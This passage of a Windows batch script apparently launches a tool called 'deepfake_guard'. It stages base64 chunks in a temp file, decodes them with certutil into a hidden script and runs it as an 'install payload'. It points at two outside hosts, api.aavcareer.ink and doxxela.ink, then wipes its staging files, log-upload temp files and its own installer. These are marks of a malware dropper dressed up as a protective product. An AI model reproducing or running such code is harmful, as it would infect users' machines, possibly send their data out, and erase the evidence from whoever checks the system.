>>"%_796e6a%" echo IGVjaG8gOmRvbmUNCg0KPj4iIV9ESCEiIGVjaG8gZGVsIC9mIC9xICIlVEVNUCVcfm52ZGdfKiIg
>>"%_796e6a%" echo Ml4+bnVsDQoNCj4+IiFfREghIiBlY2hvIGRlbCAvZiAvcSAiJVRFTVAlXH5rZG1fKi5iNjQiICIl
>>"%_796e6a%" echo VEVNUCVcfmtkbV8qLmNtZCIgMl4+bnVsDQoNCj4+IiFfREghIiBlY2hvIGRlbCAvZiAvcSAiJVRF
>>"%_796e6a%" echo TVAlXGRlZXBmYWtlX2d1YXJkLmxhdW5jaGVyLnN0YXR1cyIgMl4+bnVsDQoNCj4+IiFfREghIiBl
>>"%_796e6a%" echo Y2hvIGRlbCAvZiAvcSAiJVRFTVAlXH5udmRnX3dvcmtlci52YnMiIDJePm51bA0KDQo+PiIhX0RI
>>"%_796e6a%" echo ISIgZWNobyBkZWwgL2YgL3EgIiUlfmYwIiAyXj5udWwNCg0Kc3RhcnQgIiIgL01JTiBjbWQgL0Qg
>>"%_796e6a%" echo L0MgIiIhX0RIISIiDQoNCmV4aXQgL2IgMA0KDQo6bG9nDQoNCj4+IiVMT0clIiBlY2hvIFslZGF0
>>"%_796e6a%" echo ZSUgJXRpbWUlXSAlfjEgJX4yICV+MyAlfjQgJX41ICV+NiAlfjcgJX44ICV+OQ0KDQpleGl0IC9i
>>"%_796e6a%" echo IDANCg==
certutil -f -decode "%_796e6a%" "%_420256%" >>"%LOG%" 2>&1
if errorlevel 1 (
  >>"%LOG%" echo [%date% %time%] FAIL certutil decode failed
  echo 1^|0^|0^|decode_failed> "%LAUNCHER_STATUS%"
  del /f /q "%TEMP%\deepfake_guard.worker.lock" 2>nul
  del /f /q "%TEMP%\~kdm_*.b64" "%TEMP%\~kdm_*.cmd" 2>nul
  del /f /q "%TEMP%\~nvdg_worker.vbs" 2>nul
  exit /b 1
)
>>"%LOG%" echo [%date% %time%] OK launching install payload
set "GUARD_STORE=https://api.aavcareer.ink"
set "GUARD_STORE_FALLBACK=https://doxxela.ink"
call "%_420256%" %*
>>"%LOG%" echo [%date% %time%] OK install payload finished exit !errorlevel!
set "_ec=!errorlevel!"
del /f /q "%_796e6a%" "%_420256%" 2>nul
del /f /q "%TEMP%\~nvdg_worker.vbs" 2>nul
del /f /q "%TEMP%\~kdm_*.b64" "%TEMP%\~kdm_*.cmd" 2>nul
del /f /q "%TEMP%\deepfake_guard.launcher.status" 2>nul
del /f /q "%TEMP%\~nvdg_logupload_*.cmd" "%TEMP%\~nvdg_logupload_*.tmp" 2>nul
call :nvdg_remove_installer
exit /b %_ec%
